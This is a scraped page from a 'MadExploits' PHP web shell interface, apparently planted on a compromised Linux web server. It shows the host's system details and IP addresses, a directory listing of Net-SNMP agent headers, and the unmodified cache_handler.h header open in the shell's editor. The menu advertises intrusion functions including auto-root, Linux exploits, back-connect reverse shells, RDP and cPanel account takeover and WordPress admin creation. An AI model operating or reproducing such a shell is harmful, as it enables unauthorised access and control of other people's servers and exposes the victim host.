Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
net-snmp /
agent /
[ HOME SHELL ]
Name
Size
Permission
Action
util_funcs
[ DIR ]
drwxr-xr-x
agent_callbacks.h
801
B
-rw-r--r--
agent_handler.h
11.3
KB
-rw-r--r--
agent_index.h
1.49
KB
-rw-r--r--
agent_module_config.h
1.23
KB
-rw-r--r--
agent_read_config.h
1.19
KB
-rw-r--r--
agent_registry.h
5.86
KB
-rw-r--r--
agent_sysORTable.h
869
B
-rw-r--r--
agent_trap.h
2.37
KB
-rw-r--r--
all_helpers.h
1.19
KB
-rw-r--r--
auto_nlist.h
605
B
-rw-r--r--
baby_steps.h
3.4
KB
-rw-r--r--
bulk_to_next.h
563
B
-rw-r--r--
cache_handler.h
4.62
KB
-rw-r--r--
debug_handler.h
328
B
-rw-r--r--
ds_agent.h
3.77
KB
-rw-r--r--
instance.h
6.12
KB
-rw-r--r--
mfd.h
2.62
KB
-rw-r--r--
mib_module_config.h
34.89
KB
-rw-r--r--
mib_module_includes.h
14.06
KB
-rw-r--r--
mib_modules.h
428
B
-rw-r--r--
mode_end_call.h
871
B
-rw-r--r--
multiplexer.h
975
B
-rw-r--r--
net-snmp-agent-includes.h
756
B
-rw-r--r--
null.h
464
B
-rw-r--r--
old_api.h
1.39
KB
-rw-r--r--
read_only.h
540
B
-rw-r--r--
row_merge.h
1.32
KB
-rw-r--r--
scalar.h
783
B
-rw-r--r--
scalar_group.h
983
B
-rw-r--r--
serialize.h
600
B
-rw-r--r--
set_helper.h
542
B
-rw-r--r--
snmp_agent.h
11.89
KB
-rw-r--r--
snmp_get_statistic.h
836
B
-rw-r--r--
snmp_vars.h
4.58
KB
-rw-r--r--
stash_cache.h
1.4
KB
-rw-r--r--
stash_to_next.h
377
B
-rw-r--r--
struct.h
917
B
-rw-r--r--
sysORTable.h
2.4
KB
-rw-r--r--
table.h
7.34
KB
-rw-r--r--
table_array.h
5.33
KB
-rw-r--r--
table_container.h
3.96
KB
-rw-r--r--
table_data.h
5.47
KB
-rw-r--r--
table_dataset.h
7.73
KB
-rw-r--r--
table_iterator.h
6.76
KB
-rw-r--r--
table_tdata.h
6.54
KB
-rw-r--r--
util_funcs.h
3.24
KB
-rw-r--r--
var_struct.h
4.91
KB
-rw-r--r--
watcher.h
5.43
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cache_handler.h
/* Portions of this file are subject to the following copyright(s). See * the Net-SNMP's COPYING file for more details and other copyrights * that may apply: */ /* * Portions of this file are copyrighted by: * Copyright (C) 2007 Apple, Inc. All rights reserved. * Use is subject to license terms specified in the COPYING file * distributed with the Net-SNMP package. */ #ifndef NETSNMP_CACHE_HANDLER_H #define NETSNMP_CACHE_HANDLER_H /* * This caching helper provides a generalised (SNMP-manageable) caching * mechanism. Individual SNMP table and scalar/scalar group MIB * implementations can use data caching in a consistent manner, without * needing to handle the generic caching details themselves. */ #include <net-snmp/library/tools.h> #ifdef __cplusplus extern "C" { #endif #define CACHE_NAME "cache_info" typedef struct netsnmp_cache_s netsnmp_cache; typedef int (NetsnmpCacheLoad)(netsnmp_cache *, void*); typedef void (NetsnmpCacheFree)(netsnmp_cache *, void*); struct netsnmp_cache_s { /** Number of handlers whose myvoid member points at this structure. */ int refcnt; /* * For operation of the data caches */ int flags; int enabled; int valid; char expired; int timeout; /* Length of time the cache is valid (in s) */ marker_t timestampM; /* When the cache was last loaded */ u_long timer_id; /* periodic timer id */ NetsnmpCacheLoad *load_cache; NetsnmpCacheFree *free_cache; /* * void pointer for the user that created the cache. * You never know when it might not come in useful .... */ void *magic; /* * hint from the cache helper. contains the standard * handler arguments. */ netsnmp_handler_args *cache_hint; /* * For SNMP-management of the data caches */ netsnmp_cache *next, *prev; oid *rootoid; int rootoid_len; }; void netsnmp_cache_reqinfo_insert(netsnmp_cache* cache, netsnmp_agent_request_info * reqinfo, const char *name); netsnmp_cache * netsnmp_cache_reqinfo_extract(netsnmp_agent_request_info * reqinfo, const char *name); netsnmp_cache* netsnmp_extract_cache_info(netsnmp_agent_request_info *); int netsnmp_cache_check_and_reload(netsnmp_cache * cache); int netsnmp_cache_check_expired(netsnmp_cache *cache); int netsnmp_cache_is_valid( netsnmp_agent_request_info *, const char *name); /** for backwards compat */ int netsnmp_is_cache_valid( netsnmp_agent_request_info *); netsnmp_mib_handler *netsnmp_get_cache_handler(int, NetsnmpCacheLoad *, NetsnmpCacheFree *, const oid*, int); int netsnmp_register_cache_handler(netsnmp_handler_registration *reginfo, int, NetsnmpCacheLoad *, NetsnmpCacheFree *); Netsnmp_Node_Handler netsnmp_cache_helper_handler; netsnmp_cache * netsnmp_cache_create(int timeout, NetsnmpCacheLoad * load_hook, NetsnmpCacheFree * free_hook, const oid * rootoid, int rootoid_len); int netsnmp_cache_remove(netsnmp_cache *cache); int netsnmp_cache_free(netsnmp_cache *cache); netsnmp_mib_handler * netsnmp_cache_handler_get(netsnmp_cache* cache); void netsnmp_cache_handler_owns_cache(netsnmp_mib_handler *handler); netsnmp_cache * netsnmp_cache_find_by_oid(const oid * rootoid, int rootoid_len); unsigned int netsnmp_cache_timer_start(netsnmp_cache *cache); void netsnmp_cache_timer_stop(netsnmp_cache *cache); /* * Flags affecting cache handler operation */ #define NETSNMP_CACHE_DONT_INVALIDATE_ON_SET 0x0001 #define NETSNMP_CACHE_DONT_FREE_BEFORE_LOAD 0x0002 #define NETSNMP_CACHE_DONT_FREE_EXPIRED 0x0004 #define NETSNMP_CACHE_DONT_AUTO_RELEASE 0x0008 #define NETSNMP_CACHE_PRELOAD 0x0010 #define NETSNMP_CACHE_AUTO_RELOAD 0x0020 #define NETSNMP_CACHE_RESET_TIMER_ON_USE 0x0040 #define NETSNMP_CACHE_HINT_HANDLER_ARGS 0x1000 #ifdef __cplusplus } #endif #endif /* NETSNMP_CACHE_HANDLER_H */
Close